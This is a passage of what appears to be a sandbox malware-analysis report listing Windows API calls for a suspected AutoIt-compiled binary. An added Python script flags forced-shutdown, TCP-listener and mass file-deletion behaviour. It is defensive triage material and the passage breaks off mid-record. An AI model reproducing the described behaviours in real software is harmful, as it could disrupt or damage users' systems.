• Opcode ID: b8ba4273909bc053b5baae1c825eab24139ecb84775620ad845dd997911205dc
• Instruction ID: d7072ffa7cb0f08ee53ba01fa5154e8da233c388be7bfdcb52c0ebf114a93ca4
• Opcode Fuzzy Hash: b8ba4273909bc053b5baae1c825eab24139ecb84775620ad845dd997911205dc
• Instruction Fuzzy Hash: AB418A35604611AFE720DF15D888B69BBE1FF44328F148099E85A8BB72C775EC82CB90
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 001316C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0013170D
  • Part of subcall function 001316C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0013173A
  • Part of subcall function 001316C3: GetLastError.KERNEL32 ref: 0013174A
• ExitWindowsEx.USER32(?,00000000), ref: 0013E932
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
• String ID: $ $@$SeShutdownPrivilege
• API String ID: 2234035333-3163812486
• Opcode ID: 556c91be713f0153f95a4aad4500df8edb31d47a5d72b4de0f1d46293893bbec
• Instruction ID: f21192aab33ca0cf935c3a4d9e37ae4d8c4a0845e8340cb88ba5368d5866519e
• Opcode Fuzzy Hash: 556c91be713f0153f95a4aad4500df8edb31d47a5d72b4de0f1d46293893bbec
• Instruction Fuzzy Hash: FE01D672610311ABEB5826B49C86BBB729CA714768F164422FC03E21D1D7A05C8087E0
Uniqueness
Uniqueness Score: -1.00%

APIs
• socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00151276
• WSAGetLastError.WSOCK32 ref: 00151283
• bind.WSOCK32(00000000,?,00000010), ref: 001512BA
• WSAGetLastError.WSOCK32 ref: 001512C5
• closesocket.WSOCK32(00000000), ref: 001512F4
• listen.WSOCK32(00000000,00000005), ref: 00151303
• WSAGetLastError.WSOCK32 ref: 0015130D
• closesocket.WSOCK32(00000000), ref: 0015133C
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: ErrorLast$closesocket$bindlistensocket
• String ID:
• API String ID: 540024437-0
• Opcode ID: fd73bd71352e7f1cca94d89625dd57ba401ba46703b7e273767eafd97a76203b
• Instruction ID: 7794c1b205baac48b6ca97a14185782db55b4f97582abd85c8b997ace1d93f27
• Opcode Fuzzy Hash: fd73bd71352e7f1cca94d89625dd57ba401ba46703b7e273767eafd97a76203b
• Instruction Fuzzy Hash: 1A419331600201EFD711DF24C484B69BBE6BF86319F298199D8668F396C775EC85CBE1
Uniqueness
Uniqueness Score: -1.00%
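The per-function API listings above are the raw material for behavioural triage. Three of the records carry clear clusters: the function around ref 0013D122 enumerates a directory with the wildcard \*.* (FindFirstFileW/FindNextFileW) and applies DeleteFileW, MoveFileW and CopyFileExW; the function ending at ref 0013E932 enables SeShutdownPrivilege (LookupPrivilegeValueW/AdjustTokenPrivileges) before calling ExitWindowsEx; and the function at ref 00151276 creates an AF_INET (2)/SOCK_STREAM (1)/IPPROTO_TCP (6) socket, binds it and calls listen with a backlog of 5. Read together with the report's "Binary is likely a compiled AutoIt script file" signature, these look consistent with AutoIt runtime built-ins (directory/file operations, Shutdown(), TCPListen()), which is an editorial reading, not a finding the report itself states. The Python script below is an added example and not part of the Joe Sandbox report or its tooling: it parses lines in the report's "Name.MODULE(args), ref: addr" form (the grammar is inferred from the lines shown and is an assumption), splits the "String ID" field on "$" (also an assumption about the report's separator), and applies three rules to flag those clusters. The sample inputs are the API lines copied from the three records; the record labels and rule wording are ours.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Assumed grammar of a Joe Sandbox 'APIs' line (inferred from the report):
#   [Part of subcall function <hex>: ]<Name>.<MODULE>[(<args>)][,] ref: <hex>
API_LINE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+): )?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: list                 # None where the report shows '?', else int
    ref: int                   # call-site address
    subcall_of: Optional[int]  # callee address when the line is a subcall entry


def parse_api_lines(text: str) -> list:
    """Parse one record's 'APIs' block; bullets/indentation are stripped and
    non-matching lines (section headers etc.) are ignored. Sorted by call site."""
    calls = []
    for raw in text.splitlines():
        m = API_LINE.match(raw.strip().lstrip("•").strip())
        if not m:
            continue
        args = [None if t.strip() == "?" else int(t, 16)
                for t in m["args"].split(",")] if m["args"] else []
        calls.append(ApiCall(m["name"], m["module"].upper(), args, int(m["ref"], 16),
                             int(m["caller"], 16) if m["caller"] else None))
    return sorted(calls, key=lambda c: c.ref)


def parse_string_id(s: str) -> set:
    """'String ID' joins the referenced strings with '$' (assumed separator)."""
    return {p for p in s.split("$") if p.strip()}


def rule_shutdown(calls, strings):
    names = {c.name for c in calls}
    if {"AdjustTokenPrivileges", "ExitWindowsEx"} <= names:
        priv = "SeShutdownPrivilege" if "SeShutdownPrivilege" in strings else "a privilege"
        return f"enables {priv} then calls ExitWindowsEx (logoff/shutdown/reboot)"
    return None


def rule_tcp_listener(calls, strings):
    by_name = {c.name: c for c in calls}
    sock, listen = by_name.get("socket"), by_name.get("listen")
    if sock and "bind" in by_name and listen:
        af, typ = (sock.args + [None, None])[:2]
        fam = {2: "AF_INET", 23: "AF_INET6"}.get(af, f"af={af}")
        kind = {1: "SOCK_STREAM", 2: "SOCK_DGRAM"}.get(typ, f"type={typ}")
        backlog = listen.args[1] if len(listen.args) > 1 else None
        return f"creates a listening {fam}/{kind} socket (backlog {backlog})"
    return None


def rule_dir_walk_mutation(calls, strings):
    names = {c.name for c in calls}
    mut = names & {"DeleteFileW", "MoveFileW", "CopyFileExW", "RemoveDirectoryW"}
    if {"FindFirstFileW", "FindNextFileW"} <= names and mut:
        wild = " with wildcard \\*.*" if "\\*.*" in strings else ""
        return f"enumerates a directory{wild} and applies {', '.join(sorted(mut))}"
    return None


RULES = [rule_shutdown, rule_tcp_listener, rule_dir_walk_mutation]


def triage(api_text: str, string_id: str = "") -> dict:
    """Parse one record and return its calls, modules and rule findings."""
    calls = parse_api_lines(api_text)
    strings = parse_string_id(string_id)
    return {"calls": calls,
            "modules": sorted({c.module for c in calls}),
            "findings": [f for f in (r(calls, strings) for r in RULES) if f]}


# Constructed samples: API lines copied from three records in this section.
SAMPLE_SHUTDOWN = """
  • Part of subcall function 001316C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0013170D
  • Part of subcall function 001316C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0013173A
  • Part of subcall function 001316C3: GetLastError.KERNEL32 ref: 0013174A
• ExitWindowsEx.USER32(?,00000000), ref: 0013E932
"""
SAMPLE_SHUTDOWN_STRINGS = "$ $@$SeShutdownPrivilege"
SAMPLE_LISTENER = """
• socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00151276
• WSAGetLastError.WSOCK32 ref: 00151283
• bind.WSOCK32(00000000,?,00000010), ref: 001512BA
• closesocket.WSOCK32(00000000), ref: 001512F4
• listen.WSOCK32(00000000,00000005), ref: 00151303
"""
SAMPLE_DIRWALK = """
  • Part of subcall function 0013E199: GetFileAttributesW.KERNEL32(?,0013CF95), ref: 0013E19A
• FindFirstFileW.KERNEL32(?,?), ref: 0013D122
• DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0013D1DD
• MoveFileW.KERNEL32(?,?), ref: 0013D1F0
• FindNextFileW.KERNEL32(00000000,00000010), ref: 0013D237
  • Part of subcall function 0013D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0013D21C,?,?), ref: 0013D2B2
• FindClose.KERNEL32(00000000), ref: 0013D264
"""
SAMPLE_DIRWALK_STRINGS = "\\*.*"

if __name__ == "__main__":
    for label, text, sid in [("shutdown", SAMPLE_SHUTDOWN, SAMPLE_SHUTDOWN_STRINGS),
                             ("listener", SAMPLE_LISTENER, ""),
                             ("dirwalk", SAMPLE_DIRWALK, SAMPLE_DIRWALK_STRINGS)]:
        r = triage(text, sid)
        print(label, r["modules"], r["findings"])
```

The rules key on call names and on the argument constants the report preserves (socket family/type, listen backlog), not on the fuzzy hashes; the `subcall_of` field keeps the distinction the report draws between a function's own calls and those made inside a callee, which matters when a privilege adjustment sits in a helper shared by several callers.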

APIs
• _free.LIBCMT ref: 0010B9D4
• _free.LIBCMT ref: 0010B9F8
• _free.LIBCMT ref: 0010BB7F
• GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00173700), ref: 0010BB91
• WideCharToMultiByte.KERNEL32(00000000,00000000,001A121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0010BC09
• WideCharToMultiByte.KERNEL32(00000000,00000000,001A1270,000000FF,?,0000003F,00000000,?), ref: 0010BC36
• _free.LIBCMT ref: 0010BD4B
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: _free$ByteCharMultiWide$InformationTimeZone
• String ID:
• API String ID: 314583886-0
• Opcode ID: a6c325a4fd1e9d5ec506361f8e0cd297481cd872f562aa7483fe81883206dffd
• Instruction ID: 4eab94de5d9867fda000af301a0f089ce4a43ccf949d30e5d8e4e510c03aa5f0
• Opcode Fuzzy Hash: a6c325a4fd1e9d5ec506361f8e0cd297481cd872f562aa7483fe81883206dffd
• Instruction Fuzzy Hash: E0C13A75A08209AFDB24DF788CC1BAABBB8EF52310F24419AE4D4D72D1DBB09E41C750
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 000D3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000D3A97,?,?,000D2E7F,?,?,?,00000000), ref: 000D3AC2
  • Part of subcall function 0013E199: GetFileAttributesW.KERNEL32(?,0013CF95), ref: 0013E19A
• FindFirstFileW.KERNEL32(?,?), ref: 0013D420
• DeleteFileW.KERNEL32(?,?,?,?), ref: 0013D470
• FindNextFileW.KERNEL32(00000000,00000010), ref: 0013D481
• FindClose.KERNEL32(00000000), ref: 0013D498
• FindClose.KERNEL32(00000000), ref: 0013D4A1
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
• String ID: \*.*
• API String ID: 2649000838-1173974218
• Opcode ID: 8d39b9c6759bb182c5e01755a733aa69d68e91e854b8c610dfbdd01e7dd783a4
• Instruction ID: 9f91e2852e2c2e79efa0ced4e77d4732199dcffcb85a8211c37155bc7df06fe0
• Opcode Fuzzy Hash: 8d39b9c6759bb182c5e01755a733aa69d68e91e854b8c610dfbdd01e7dd783a4
• Instruction Fuzzy Hash: D43160711083459BC305EF64E8918EFB7E8BF92314F444A1EF4D193292EB30AA09D7A3
Uniqueness
Uniqueness Score: -1.00%

APIs
• _wcslen.LIBCMT ref: 001464DC
• CoInitialize.OLE32(00000000), ref: 00146639
• CoCreateInstance.OLE32(0016FCF8,00000000,00000001,0016FB68,?), ref: 00146650
• CoUninitialize.OLE32 ref: 001468D4
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: CreateInitializeInstanceUninitialize_wcslen
• String ID: .lnk
• API String ID: 886957087-24824748
• Opcode ID: 4fbf70f65326f8214cca90d558f63e699e2ab7de5fcae8ad1340722cd1f10115
• Instruction ID: 895edaca30f2500e07156e36bb7fdb829644b1feeef4984855d9b4462bec56b1
• Opcode Fuzzy Hash: 4fbf70f65326f8214cca90d558f63e699e2ab7de5fcae8ad1340722cd1f10115
• Instruction Fuzzy Hash: 9BD128715083019FD314EF24C8819ABB7E9FF95708F40496EF5958B2A2EB71ED05CBA2
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetForegroundWindow.USER32(?,?,00000000), ref: 001522E8
  • Part of subcall function 0014E4EC: GetWindowRect.USER32(?,?), ref: 0014E504
• GetDesktopWindow.USER32 ref: 00152312
• GetWindowRect.USER32(00000000), ref: 00152319
• mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00152355
• GetCursorPos.USER32(?), ref: 00152381
• mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 001523DF
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Window$Rectmouse_event$CursorDesktopForeground
• String ID:
• API String ID: 2387181109-0
• Opcode ID: 384ded417fef7c085804f489cafaf49e1020634deb810ded6a8d42d5af90d819
• Instruction ID: 6cce40db45c216dcb762d22f8c47f93572299bcf9217b5a88d00fb030f8c6564
• Opcode Fuzzy Hash: 384ded417fef7c085804f489cafaf49e1020634deb810ded6a8d42d5af90d819
• Instruction Fuzzy Hash: 9031ED72104305ABC720DF54CC48BABBBE9FF89314F000A19F8959B291DB74EA48CBD2
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 000D9CB3: _wcslen.LIBCMT ref: 000D9CBD
• FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00149B78
• FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00149C8B
  • Part of subcall function 00143874: GetInputState.USER32 ref: 001438CB
  • Part of subcall function 00143874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00143966
• Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00149BA8
• FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00149C75
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
• String ID: *.*
• API String ID: 1972594611-438819550
• Opcode ID: 80a37903aefb38a4f8c10a5dd869f8c49c7d192c725ae35adff18ec03afe2604
• Instruction ID: 1abdc0cb657405e242eff960bb621e2223ab461d74602f7de1332929f5736462
• Opcode Fuzzy Hash: 80a37903aefb38a4f8c10a5dd869f8c49c7d192c725ae35adff18ec03afe2604
• Instruction Fuzzy Hash: DA41517194420A9FCF14DF64CD85AEFBBB8EF05311F244156E815A62A1EB309E94CFA1
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 000E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 000E9BB2
• DefDlgProcW.USER32(?,?,?,?,?), ref: 000E9A4E
• GetSysColor.USER32(0000000F), ref: 000E9B23
• SetBkColor.GDI32(?,00000000), ref: 000E9B36
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Color$LongProcWindow
• String ID:
• API String ID: 3131106179-0
• Opcode ID: 96cb1e2f47f7e33b2b9199ea909f97aa17cc0c2b39507d91ea311c0fd129a643
• Instruction ID: da2a2735effb2fea0113962f0243bbbd7c42ae01175735befb7108ca088953de
• Opcode Fuzzy Hash: 96cb1e2f47f7e33b2b9199ea909f97aa17cc0c2b39507d91ea311c0fd129a643
• Instruction Fuzzy Hash: 40A12A702085A4BFE739AA3E9C58D7F369DDF42344F190219F502E6AD2CB259D51C2B3
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0015304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0015307A
  • Part of subcall function 0015304E: _wcslen.LIBCMT ref: 0015309B
• socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0015185D
• WSAGetLastError.WSOCK32 ref: 00151884
• bind.WSOCK32(00000000,?,00000010), ref: 001518DB
• WSAGetLastError.WSOCK32 ref: 001518E6
• closesocket.WSOCK32(00000000), ref: 00151915
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
• String ID:
• API String ID: 1601658205-0
• Opcode ID: 343334b7af93d836764b0d62eff8955a79efb2a1c086f9dc773825ee373e137c
• Instruction ID: 2c509c20c2f19c38ef2dc0ced55a8b78cd421cdb3d3a2463d0c3d69a35ae2bcd
• Opcode Fuzzy Hash: 343334b7af93d836764b0d62eff8955a79efb2a1c086f9dc773825ee373e137c
• Instruction Fuzzy Hash: 0651C571A00200AFD721AF24C886F6A77E5AB44718F44805DF959AF3C3D7B1AD41CBE1
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Window$EnabledForegroundIconicVisibleZoomed
• String ID:
• API String ID: 292994002-0
• Opcode ID: 0d1efe1c2f0670858a35a0a35a034da47393fc965d3f80397d64cf6123951d7c
• Instruction ID: 751865774a00e0f35c3180df0647abd9808695a6ba662194534a4436dee76a26
• Opcode Fuzzy Hash: 0d1efe1c2f0670858a35a0a35a034da47393fc965d3f80397d64cf6123951d7c
• Instruction Fuzzy Hash: 4121A3317406116FD7209F1ACC44F6A7BA5EF95325B1D8069E84ACB351CBB1DC52CB90
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 0015A6AC
• Process32FirstW.KERNEL32(00000000,?), ref: 0015A6BA
  • Part of subcall function 000D9CB3: _wcslen.LIBCMT ref: 000D9CBD
• Process32NextW.KERNEL32(00000000,?), ref: 0015A79C
• CloseHandle.KERNEL32(00000000), ref: 0015A7AB
  • Part of subcall function 000ECE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00113303,?), ref: 000ECE8A
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
                                                                                                                                                                                                                                          • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1991900642-0
                                                                                                                                                                                                                                          • Opcode ID: dba6b04145e8d5628c1b31ba0f5416cb0898c8af65c4ade07ba2d836418d102f
                                                                                                                                                                                                                                          • Instruction ID: b6a054ad23819206cb3a4862f0c4a62d499d91779c502d905f949cd9846f1236
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dba6b04145e8d5628c1b31ba0f5416cb0898c8af65c4ade07ba2d836418d102f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F516F715083019FD310DF24C886AABBBE8FF89754F40491EF99597352EB71D904CBA2
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,00115222), ref: 0013DBCE
                                                                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 0013DBDD
                                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0013DBEE
                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0013DBFA
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2695905019-0
                                                                                                                                                                                                                                          • Opcode ID: b79b71d7db74abf78652d017e117b577db04ba19722ceea598f7cad5351c0500
                                                                                                                                                                                                                                          • Instruction ID: 966e779e12200af0d1f9347b88bfad4c7a74fc6ab240df166aedae36c5575f06
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b79b71d7db74abf78652d017e117b577db04ba19722ceea598f7cad5351c0500
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2F0A970820910A7C2206B78BC0D8BA77AD9F02334F10470AF8B6C24E0EBF09994C6D6
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00145CC1
                                                                                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00145D17
                                                                                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 00145D5F
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3541575487-0
                                                                                                                                                                                                                                          • Opcode ID: db99d40e8619246b39fb7174905779d35c05a89ccc0356747ebff5d02b2efef3
                                                                                                                                                                                                                                          • Instruction ID: ea88df73f85de11cc63204cdc2fd745afa9eed5129e95733bfae795568ffd66c
